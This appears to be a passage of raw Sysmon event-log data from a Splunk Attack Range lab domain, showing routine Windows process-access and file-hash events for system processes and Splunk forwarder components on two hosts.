Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB21AA7180C8B43A23A992F47DB272BD,SHA256=71DBCCA8263575F075B94D1D36D5A01E31DDBC4F02143A9FD7801B9A77B86170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807491Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:49.379{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=507D35E148AF0D65C3BB4042A3164ADF,SHA256=AA273CCA0CF341FB8A92DA35B4704ED3F2ED4278AF5A7FC569AB0245B10888D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807490Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:49.223{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A3C6B3A5BDAC193BB0884FB844550BE,SHA256=9B91D64718F80180E31F19DA49D15391271EC08FC11220093727FA0982468788,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.934{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F496-60EB-297D-00000000CF01}10208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.918{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.918{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F496-60EB-297D-00000000CF01}10208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.918{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.918{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F496-60EB-297D-00000000CF01}10208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.903{466BC892-F496-60EB-297D-00000000CF01}10208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program 